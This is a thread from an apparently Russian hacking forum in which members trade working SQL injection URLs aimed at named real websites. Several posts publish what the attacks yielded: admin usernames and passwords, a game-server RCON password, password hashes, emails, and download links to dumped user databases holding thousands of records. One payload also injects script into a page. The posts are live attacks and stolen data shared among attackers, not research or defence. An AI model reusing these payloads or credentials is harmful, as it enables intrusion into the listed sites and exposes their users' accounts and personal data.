SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://kacca.webdevelopment.us/index.php?iid=ViewPlace&id=-1+union+select+1,concat(email,0x3a,passwd),3,4,5,6,7+from+users+limit+0,1/*
    help me find the admin panel table
     
    1 person likes this.
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    злюка, the table is admins ;)
     
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    and what is this?
     
  4. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    didn't look at the source
     
    1 person likes this.
  5. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.a2k.org.ua/index.php?topic=9&section=-1+union+select+concat(user,password)+from+users/*&lng=ru

    http://www.a2k.org.ua/admin/

    admin:repz
    ------------------------------------------------------------

    http://www.sevzapmebel.ru/index.php?area=hidden&level=-1+union+select+table_name+from+information_schema.tables+limit+14,1/*

    -------------------------------------------------------------

    http://www.btk.ru/index.php?category=-1+union+select+1111,222,3,'<script sql>alert(/_ANTICHAT_/)</script sql>',44,1+from+articles/*
     
    #545 *D1VER, 19 Feb 2007
    Last edited: 19 Feb 2007
    1 person likes this.
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    http://www.bulgaria.by/rus/index.php?text_id=-99+union+select+concat(login,0x3a,pwd)+from+user+limit+0,1/*
    
    =\
     
  7. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    www.skype-forum.com

    DB: __http://rapidshare.com/files/17283919/db_skype-forum.com.rar

    format: email icq md5-hash (xls) 273kb in rar
    pass:a-chat
    number of records: 7217


    by the way, for those who didn't see it, last time I posted
    __http://rapidshare.com/files/15758988/base_forum_siemens-club_ru.rar
     
    3 people like this.
  8. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    :)
     
    2 people like this.
  9. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    heh, my first one in this thread. :)
     
    3 people like this.
  10. C[]R3

    C[]R3 Elder - Старейшина

    Joined:
    16 Jan 2007
    Messages:
    32
    Likes Received:
    6
    Reputations:
    0
    haha, you're killing it))

    here's what I dug up
     
  11. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Code:
    __http://www.craftersforcritters.com/vendor.php?id=119+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(user()+using+latin1),15/*
    no idea what can be done with this
    Code:
    __http://www.ogilvy.com/viewpoint/view_ko.php?id=42734'&iMagaId=9
    Code:
    __http://www.theracersgroup.com/shop/car.php?id=-19+union+select+1,2,3,4,5,6,7,8,user(),database(),version(),12,3,14,5,6,7,8,9,20,1,22,3,4,5,26,7,8,9,0,1,2,33,34,5,6/*
     
    #551 Thanat0z, 21 Feb 2007
    Last edited: 21 Feb 2007
    1 person likes this.
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    :)
     
    5 people like this.
  13. fod

    fod Member

    Joined:
    5 Feb 2007
    Messages:
    11
    Likes Received:
    5
    Reputations:
    10
    _http://kramer.ru/admin/includes/head.inc
     
    1 person likes this.
  14. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://webz.priop.ru/index.php?categ=-628+union+select+1,2,3,4,5,6,7,8,9,10/* don't feel like going through the tables))
     
  15. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    For CS fans :)

    Code:
    http://cs.cyfra.ua/advstat.php?mode=admin
    Login:admin
    Pass:street


    RCON_PASSWORD, for all Cyfra servers:

    Pass: rconpassword6

    And in general, here:

    Cyfra:

    Code:
    http://cs.cyfra.ua/advstat.php?mode=playerinfo&player=47595&killLimit=1+union+select+concat_ws(CHAR(58),user(),database(),version()),2,3,4,5/*
    Lucky:

    Code:
    http://cs.lucky.net/hlstats/hlstats.php?mode=playerinfo&player=47595&killLimit=1+order+by+5/*
    DB version is 3 (.

    If needed, I can look for vbios.com dumps.
     
    #555 _-[A.M.D]HiM@S-_, 21 Feb 2007
    Last edited: 21 Feb 2007
    3 people like this.
  16. RaDDeaD

    RaDDeaD Elder - Старейшина

    Joined:
    28 Dec 2006
    Messages:
    44
    Likes Received:
    18
    Reputations:
    1
    What else can be done on this site? I tried what I could, didn't dig up anything except user() database()... ;)
     
  17. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    77
    Likes Received:
    64
    Reputations:
    7
    online store

    online store.
    the database is just super_super :D :D :D
     
    1 person likes this.
  18. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.ofb.biz/article.pl?sid=-75+UNION+SELECT+1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
    Username:cellularguy
    Password:a.CLuP.omGhUo
    Mail:[email protected]



    Code:
    http://www.orientation-lyon.org/choix/bts2007/detail.php?idd=658+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+from+orientationlyon_users/*
    Username:System Administrator
    Password:96da4c180c95beb563b797df331f4e8f

    not much :(
     
  19. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    _http://www.whenhamstersattack.com/news.php?id=-99+union+select+1,2,3,4,5,6,7/*

    heh, scary to go through it.. there's sooo much there ;)
     
  20. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    www.Tetis-Pro.ru
    Code:
    http://www.tetis-pro.ru/?menu_id=&page_id=-1+union+select+1,2,login,pass,5,6,7,8,9+from+users+limit+0,1/*
    admin:xxx
    http://www.tetis-pro.ru/admin


    Code:
    http://www.iriscom.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     